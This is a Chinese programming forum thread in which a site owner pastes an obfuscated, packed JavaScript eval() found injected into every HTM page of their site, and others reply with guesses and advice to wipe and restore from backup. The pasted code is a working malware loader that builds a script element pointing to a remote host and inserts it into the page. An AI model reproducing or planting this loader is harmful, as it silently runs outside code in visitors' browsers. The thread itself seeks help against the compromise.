| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 763 人关注过本帖
标题:我站被挂以下代码,也不知道是什么,每个 HTM 都有,谢谢啊
只看楼主 加入收藏
wuyuede
Rank: 1
等 级:新手上路
帖 子:110
专家分:0
注 册:2007-3-29
结帖率:75%
收藏
 问题点数:0 回复次数:3 
我站被挂以下代码,也不知道是什么,每个 HTM 都有,谢谢啊
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('61(18(16,12,10,14,11,13){11=18(10){21(10<12?"":11(60(10/12)))+((10=10%12)>35?28.59(10+29):10.57(36))};37(!\'\'.34(/^/,28)){32(10--)13[11(10)]=14[10]||11(10);14=[18(11){21 13[11]}];11=18(){21\'\\\\30+\'};10=1};32(10--)37(14[10])16=16.34(67 66(\'\\\\15\'+11(10)+\'\\\\15\',\'17\'),14[10]);21 16}(\'19 11$=[\\\'\\\\15\\\\6\\\\7\\\\8\\\\13\\\\4\\\',\\\'\\\\39\\\\4\\\\4\\\\13\\\\65\\\\20\\\\20\\\\6\\\\10\\\\5\\\\17\\\\25\\\\8\\\\56\\\\17\\\\39\\\\26\\\\9\\\\13\\\\8\\\\5\\\\14\\\\8\\\\3\\\\17\\\\6\\\\9\\\\12\\\\20\\\\6\\\\10\\\\5\\\\20\\\\4\\\\9\\\\5\\\\24\\\\14\\\\8\\\\17\\\\14\\\\15\\\',\\\'\\\\15\\\\6\\\\7\\\\8\\\\13\\\\4\\\'];19 31=31||[];(42(){19 23=16["\\\\10\\\\9\\\\6\\\\26\\\\12\\\\3\\\\5\\\\4"]["\\\\6\\\\7\\\\3\\\\22\\\\4\\\\3\\\\40\\\\25\\\\3\\\\12\\\\3\\\\5\\\\4"](11$[0]);23["\\\\15\\\\7\\\\6"]=11$[1];19 27=16["\\\\10\\\\9\\\\6\\\\26\\\\12\\\\3\\\\5\\\\4"]["\\\\24\\\\3\\\\4\\\\40\\\\25\\\\3\\\\12\\\\3\\\\5\\\\4\\\\15\\\\41\\\\52\\\\70\\\\22\\\\24\\\\33\\\\22\\\\12\\\\3"](11$[2])[82];27["\\\\13\\\\22\\\\7\\\\3\\\\5\\\\4\\\\33\\\\9\\\\10\\\\3"]["\\\\8\\\\5\\\\15\\\\3\\\\7\\\\4\\\\41\\\\3\\\\30\\\\9\\\\7\\\\3"](23,27)})();\',38,38,\'|||73|80|76|77|71|79|87|83|50|74|88|75|72|86|85|84|81|78|69|51|53|54|49|48|43|44|45|47|46|55|18|64|68|63|62\'.58(\'|\'),0,{}))',10,89,'||||||||||c|e|a|d|k|b|p|g|function|i|f|return|h|o|m|j|l|n|String||w|t|while|q|replace|||if||s|u|r|x|x42|x68|sbj2d3|x62|x45|x4e|window|x73|x67|y|sbjda3|sbj1a8|x66|v|toString|split|fromCharCode|parseInt|eval|x3a|0x0|x79|B|RegExp|new|x54|x75|z|x72|x2f|x65|x64|_|x6e|x63|x6a|x69|x74|x6c|A|x6d|var|x61|x2e|x6f|x70'.split('|'),0,{}))}
搜索更多相关主题的帖子: function replace return 
2014-06-06 22:44
guojianlin19
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2011-8-23
收藏
得分:0 
顶贴,学习。
不过看下边好像是获取系统版本。
2014-07-07 21:55
hu9jj
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:红土地
等 级:贵宾
威 望:400
帖 子:11772
专家分:43421
注 册:2006-5-13
收藏
得分:0 
清空服务器上所有文件,用备份的文件重新上传。

活到老,学到老!http://www.(该域名已经被ISP盗卖了)E-mail:hu-jj@
2014-07-07 22:02
Paxster
Rank: 5Rank: 5
来 自:湖北武汉
等 级:职业侠客
威 望:3
帖 子:40
专家分:320
注 册:2014-7-18
收藏
得分:0 
这尼玛是正则表达式么→_→

念念不忘,必有回响。
2014-07-23 15:08
快速回复:我站被挂以下代码,也不知道是什么,每个 HTM 都有,谢谢啊
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.017571 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved